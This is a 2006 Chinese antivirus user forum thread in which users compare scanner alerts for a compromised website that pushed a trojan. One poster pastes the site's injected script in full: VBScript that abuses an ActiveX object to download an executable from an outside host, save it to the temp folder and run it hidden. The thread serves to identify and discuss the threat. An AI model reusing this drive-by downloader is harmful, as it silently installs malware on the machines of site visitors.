微点交流论坛

标题: 这个网站被挂马，其它软件有报，微点没有反应。 [打印本页]

作者: liming 时间: 2006-8-21 00:26 标题: 这个网站被挂马，其它软件有报，微点没有反应。

www.z213.com/z213/。
我用的瑞星有报。
刚装的微点，没有一点反应。为什么？

作者: Legend 时间: 2006-8-21 03:26
经测试，此网站没有下载任何文件，也没有生成任何文件，属于误报！

作者: garry 时间: 2006-8-21 09:57
我打开会报啊，提示临时文件夹里面的gold.com想访问网络

作者: garry 时间: 2006-8-21 09:58
哈哈，好像这个网站被人黑掉了哦

作者: 我 时间: 2006-8-21 09:59

Quote:

Originally posted by garry at 2006-8-21 09:58:
哈哈，好像这个网站被人黑掉了哦

被人黑了！　刚上去:mad:

作者: 21wmd 时间: 2006-8-21 16:49
会的，SSM已经拦截

可以在这里查查
C:\Documents and Settings\王明栋\Local Settings\Temp (将XXX换成自己的用户)下生成一个gold

作者: David 时间: 2006-8-21 17:00
Trojan.DL.VBS.Agent.l
广告弹窗木马

作者: pjc1980 时间: 2006-8-21 19:41
微点报了

作者: liming 时间: 2006-8-21 22:22
我装的微点怎么就没有反映呢？

作者: 囚中城 时间: 2006-8-21 23:17
成人网……
NOD32跟ewido＋微点都没报呀。可能要停留一段时间，等木马下载完吧。不过我这人多，不能老开这窗口

作者: 反黑先锋 时间: 2006-8-22 06:39

Quote:

Originally posted by 囚中城 at 2006-8-21 23:17:
成人网……
NOD32跟ewido＋微点都没报呀。可能要停留一段时间，等木马下载完吧。不过我这人多，不能老开这窗口

小红伞报了两下～:lol:

作者: flo 时间: 2006-8-22 16:22
AVP6也报了，吓了我一跳...
这个网站绝对有问题啊。
document.writeln("<script language=\"VBScript\">");
document.writeln(" on error resume next");
document.writeln("dl = \"http:\/\/www.23597.com\/pc\/ms.exe\"");
document.writeln(" Set df = document.createElement(\"object\")");
document.writeln(" df.setAttribute \"classid\", \"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\"");
document.writeln(" str=\"Microsoft.XMLHTTP\"");
document.writeln(" Set x = df.CreateObject(str,\"\")");
document.writeln(" a1=\"Ado\"");
document.writeln(" a2=\"db.\"");
document.writeln(" a3=\"Str\"");
document.writeln(" a4=\"eam\"");
document.writeln(" str1=a1&a2&a3&a4");
document.writeln(" str5=str1");
document.writeln(" set S = df.createobject(str5,\"\")");
document.writeln(" S.type = 1");
document.writeln(" str6=\"GET\"");
document.writeln(" x.Open str6, dl, False");
document.writeln(" x.Send");
document.writeln(" fname1=\"g0ld.com\"");
document.writeln(" set F = df.createobject(\"Scripting.FileSystemObject\",\"\")");
document.writeln(" set tmp = F.GetSpecialFolder(2) ");
document.writeln(" fname1= F.BuildPath(tmp,fname1)");
document.writeln(" S.open");
document.writeln(" S.write x.responseBody");
document.writeln(" S.savetofile fname1,2");
document.writeln(" S.close");
document.writeln(" set Q = df.createobject(\"Shell.Application\",\"\")");
document.writeln(" Q.ShellExecute fname1,\"\",\"\",\"open\",0");
document.writeln(" <\/script>")
标准的下载后运行代码。

[ Last edited by flo on 2006-8-22 at 16:25 ]

作者: claymore 时间: 2006-8-23 18:32
这个是利用系统漏洞下载的

反正我点了没有生成任何文件 - - 也没有防火墙报...

作者: 285166790 时间: 2006-8-27 10:54
我上了一下这个网站，微点报是报了也杀了，可是网站还是不停的弹出窗口，搞的我都死机了，这到底算怎么回事

作者: pjc1980 时间: 2006-8-27 11:24
微点没报，但是IE把该网站一些信息自动拦截了

作者: yuying369 时间: 2006-8-27 11:34 标题: 有点过分了！

报是报了，一查结果：
我用磁盘整理软件服务也被截了！
怎样设置微点还没找着！

作者: Legend 时间: 2006-8-27 11:36
yuying369,请你把你的程序生成日志,木马日志,进程启动退出日志,发到SUPPORT@MICROPOINT.COM.CN 并在邮件中注明访问了什么网站,出现什么情况,结果是什么谢谢

作者: keqiner 时间: 2006-8-27 20:33
建议大家在安装完微点后先来个漏洞扫描...把漏洞都打好了..!!

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn